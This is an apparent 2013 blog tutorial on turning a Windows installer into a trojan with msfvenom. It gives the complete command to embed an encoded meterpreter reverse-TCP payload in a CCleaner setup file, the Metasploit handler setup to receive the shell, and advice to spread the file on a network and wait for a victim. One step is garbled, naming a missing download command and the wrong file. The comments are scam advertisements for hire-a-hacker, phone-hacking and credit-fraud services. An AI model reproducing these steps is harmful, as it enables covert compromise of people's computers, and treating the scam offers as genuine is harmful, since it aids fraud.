Advertisement

Monday, August 26, 2013

Backdoor Windows Executables Using Metasploit's Plugin Msfvenom

In this tutorial, we will show you how to backdoor windows executables(exe) files using Metasploit Exploitation Framework's plugin Msfvenom(combo of msfpayload and msfencoder)

  Now follow step by step:

Attacker's IP: 192.168.0.14
Victim's IP: 192.168.0.x (within LAN network it might be any IP)


1-First Download a windows executable file. For example we will take ccleaner software installer file.


 
You can also use any setup file with .exe extension.



2- I was in root directory when i used above command. So, putty got downloaded in /root/ directory.
Now use msfvenom to backdoor this executable using the following command.

msfvenom -p windows/meterpreter/reverse_tcp -f exe -e x86/shikata_ga_nai -i 25 -k -x /root/ccleaner.exe LHOST=192.168.0.14 LPORT=4444 > evilcleaner.exe

Above command will generate an EXE file with the name evilcleaner.exe. This is our backdoored executable file.
3- Start metasploit.

msfconsole

4- Start metasploit's reverse handler to get a reverse connection.


use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.0.14
set LPORT 4444
exploit

5- Distribute this evilClearner.exe file in your LAN/Wifi network and wait for victim. When victim will open this evilcleaner.exe , you will get a reverse shell on your metasploit's handler.

Happy Hacking :)

4 comments:

Anonymous said...

Awsome

Anonymous said...

Help me thank cyberappshacker after being scammed of $1500 he helped me find my cheating husband he
helped hack his whatsapp gmail and kik and i got to know that he was cheating on me , in less than 24 hours
he helped me out with everything cyberappshacker is trust worthy and affordable contact CYBERPROFESSIONALHACKER@GMAIL.COM

Edward Mills said...

You think you got bad credit ? well mine was terrible. I was on the verge of loosing my house & family, when i got saved by an old friend of mine who introduced me to a genius hacker named CYBORG I was skeptical at first but i had no choice, i was about to loose everything. So i contacted him via email at CYBORGUNLEASH@MAIL.RU and i must say, he's the best at what he does. He raised my credit score to a golden score and removed the eviction from my credit among other negative listings. Now my life is much better than i ever thought it would. I can now get approved for loans, mortgage, surgery e.t.c. I’ll implore you to contact him on the email address above or via phone number: +16787866844 to help fix your credit now. He’s the only one i trust can help out in any credit related issue.

Anonymous said...


•★COMPOSITE HACKS ★•

Are You Seeking For A LEGIT PROFESSIONAL HACKER Who Will Get Your Job Done Efficiently With Swift Response?? CONGRATULATIONS, Your Search Ends Right Here.

★ WHO ARE COMPOSITE HACKS ???
• We are a Team Of Professional HACKERS , a product of the coming together of Legit Hackers from the Dark-Web (pentaguard, CyberBerkut, White Hack and Black Hat,) we have been existing for over years, our system is a very strong and decentralized command structure that operates on ideas and directives.

★ JOB GUARANTEE:
Whenever We Are been hired as a Team Hackers We typically only take jobs that We find somehow original, challenging, or especially helpful to the community. We’ve never wanted to sit around defending some video game company’s source code from network intruders – We prefer to help nonprofits, private investigators, Private Individuals, government contractors, and other traditionally underserved populations. 
And We’d rather match skills against the best in the field of state-sponsored hackers engaged in economic espionage than put some kid in prison for pranking the phone company. When a company tries to hire Us, the first question I ask is: “Who is this going to help?”
I know COMPOSITE HACKS is Well known for LEGIT HACKING SERVICES, but i always try to avoid people thinking We’r proud or making Many individual think its only the big companies that can hire Us, fine, here is Our mail: “””compositehacks@cyberservices.com””” You Can Reach Out To Us for Your Desired HACKING Services Ranging from:
* Penetration Testing
* Jail Breaking
* PHONE HACKING (Which gives you Unnoticeable Access to Everything that is Happening on the phone such as call logs, messages, chats and all social media Apps .
* Retrieval Of Lost Files
* Location Tracking.
* Clearing Of Criminal Records.
* Hacking Of Server, Database And Social Media accounts e.g Facebook, twitter, Instagram Snapchat etc

★ SOME SPECIAL SERVICES WE OFFER:
* RECOVERY OF LOST FUNDS ON BINARY OPTIONS.
* Bank Accounts Loading ( Only USA Banks)
* Credit Cards Loading (Only USA CC’s)’

★Our Team houses a separate group of specialists who are productively focussed and established authorities in different platforms. They hail from a proven track record Called “HackerOne” and have cracked even the toughest of barriers to intrude and capture or recapture all relevant data needed by our Clients. Some Of These Specialist Includes PETER YAWORSKI, FRANS ROSEN, JACK CABLE, JOBERT ABMA, ARNE SWINNEN And More

★COMPOSITE HACKS is available for customer care 24/7, all day and night. We understand that your request might be urgent, so we have a separate team of allocated hackers who interact with our Clients round the clock. You are with the right people so just get started.

★CONTACT:
* Email:
compositehacks@cyberservices.com
compositehacks@gmail.com
* Wickr: compositehacks



★CONTACT US AND GET YOUR PROBLEMS SOLVED IN THE TWINKLING OF AN EYE

Post a Comment

 
Design by Vinit Varghese | Bloggerized by Hemanth Joseph - Premium Blogger Themes | Online Project management